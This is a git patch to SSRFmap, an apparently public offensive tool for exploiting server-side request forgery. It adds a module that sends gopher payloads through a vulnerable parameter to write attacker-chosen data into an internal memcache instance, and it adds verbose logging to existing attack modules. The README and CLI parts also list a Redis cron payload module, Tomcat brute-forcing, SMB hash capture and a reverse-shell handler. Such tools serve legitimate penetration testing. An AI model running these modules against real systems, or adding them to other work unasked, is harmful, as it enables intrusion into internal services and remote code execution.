From da86cab4426bcee74118a2b446b83a57791899bb Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Mon, 8 Jul 2019 23:46:48 +0200
Subject: [PATCH] MODULE - Memcache store data

---
 README.md           | 38 ++++++++++++++++++++------------------
 modules/custom.py   | 19 +++++++++++++------
 modules/memcache.py | 34 ++++++++++++++++++++++++++++++++++
 modules/redis.py    |  6 ++++++
 ssrfmap.py          |  1 +
 5 files changed, 74 insertions(+), 24 deletions(-)
 create mode 100644 modules/memcache.py

diff --git a/README.md b/README.md
index a20e44c..8ef69ae 100644
--- a/README.md
+++ b/README.md
@@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
 | `smbhash`      | Force an SMB authentication via a UNC Path |
 | `tomcat`       | Bruteforce attack against Tomcat Manager |
 | `custom`       | Send custom data to a listening service, e.g: netcat |
+| `memcache`     | Store data inside the memcache instance |
 
 
 ## Install and Manual
@@ -46,26 +47,27 @@ The following modules are already implemented and can be used with the `-m` argu
 Basic install from the Github repository.
 
 ```powershell
-git clone https://github.com/swisskyrepo/SSRFmap
-cd SSRFmap/
-pip3 install -r requirements.txt
-python3 ssrfmap.py
+$ git clone https://github.com/swisskyrepo/SSRFmap
+$ cd SSRFmap/
+$ pip3 install -r requirements.txt
+$ python3 ssrfmap.py
 
-usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
-                  [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
-                  [--ssl [SSL]] [--level [LEVEL]]
+  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
+                    [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
+                    [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
 
-optional arguments:
-  -h, --help          show this help message and exit
-  -r REQFILE          SSRF Request file
-  -p PARAM            SSRF Parameter to target
-  -m MODULES          SSRF Modules to enable
-  -l HANDLER          Start an handler for a reverse shell
-  --lhost LHOST       LHOST reverse shell
-  --lport LPORT       LPORT reverse shell
-  --uagent USERAGENT  User Agent to use
-  --ssl [SSL]         Use HTTPS without verification
-  --level [LEVEL]     Level of test to perform (1-5, default: 1)
+  optional arguments:
+    -h, --help          show this help message and exit
+    -r REQFILE          SSRF Request file
+    -p PARAM            SSRF Parameter to target
+    -m MODULES          SSRF Modules to enable
+    -l HANDLER          Start an handler for a reverse shell
+    -v [VERBOSE]        Enable verbosity
+    --lhost LHOST       LHOST reverse shell
+    --lport LPORT       LPORT reverse shell
+    --uagent USERAGENT  User Agent to use
+    --ssl [SSL]         Use HTTPS without verification
+    --level [LEVEL]     Level of test to perform (1-5, default: 1)
 ```
 
 ## Examples
diff --git a/modules/custom.py b/modules/custom.py
index 13e4aae..68ed1de 100644
--- a/modules/custom.py
+++ b/modules/custom.py
@@ -14,10 +14,17 @@ class exploit():
 
     def __init__(self, requester, args):
         logging.info("Module '{}' launched !".format(name))
-        gen_host = gen_ip_list("127.0.0.1", args.level)
-        SERVICE_PORT = input("Service Port: ")
-        SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
+        gen_hosts = gen_ip_list("127.0.0.1", args.level)
+        self.SERVICE_PORT = input("Service Port: ")
+        self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
 
-        for SERVICE_IP in gen_host:
-            payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT)
-            r = requester.do_request(args.param, payload)
\ No newline at end of file
+        for gen_host in gen_hosts:
+            payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
+            
+            if args.verbose == True:
+                logging.info("Generated payload : {}".format(payload))
+
+            r = requester.do_request(args.param, payload)
+
+            if args.verbose == True:
+                logging.info("Module '{}' ended !".format(name))
\ No newline at end of file
diff --git a/modules/memcache.py b/modules/memcache.py
new file mode 100644
index 0000000..cb2b133
--- /dev/null
+++ b/modules/memcache.py
@@ -0,0 +1,34 @@
+from core.utils import *
+import urllib.parse
+import logging
+
+name          = "memcache"
+description   = "Store data inside the memcache instance"
+author        = "Swissky"
+documentation = []
+
+class exploit():
+    SERVICE_IP   = "127.0.0.1"
+    SERVICE_PORT = "11211"
+    SERVICE_DATA = "\r\n"
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        payload = input("Data to store: ")
+
+        self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
+        self.SERVICE_DATA += '{}\r\n'.format(payload)
+        self.SERVICE_DATA += 'quit\r\n'
+        self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
+
+        for SERVICE_IP in gen_host:
+            payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
+
+            if args.verbose == True:
+                logging.info("Generated payload : {}".format(payload))
+
+            r = requester.do_request(args.param, payload)
+
+            if args.verbose == True:
+                logging.info("Module '{}' ended !".format(name))
\ No newline at end of file
diff --git a/modules/redis.py b/modules/redis.py
index 7879429..098e378 100644
--- a/modules/redis.py
+++ b/modules/redis.py
@@ -45,9 +45,15 @@ class exploit():
             payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
             payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
 
+            if args.verbose == True:
+                logging.info("Generated payload : {}".format(payload))
+                
             # Send the payload
             r = requester.do_request(args.param, payload)
 
+            if args.verbose == True:
+                logging.info("Module '{}' ended !".format(name))
+
 """
 TODO:
 This exploit only works if you have control over a cron file.
diff --git a/ssrfmap.py b/ssrfmap.py
index 9d4daf4..4908dc7 100644
--- a/ssrfmap.py
+++ b/ssrfmap.py
@@ -29,6 +29,7 @@ def parse_args():
     parser.add_argument('-p', action ='store', dest='param',   help="SSRF Parameter to target")
     parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
     parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
+    parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
     parser.add_argument('--lhost', action ='store', dest='lhost',     help="LHOST reverse shell")
     parser.add_argument('--lport', action ='store', dest='lport',     help="LPORT reverse shell")
     parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")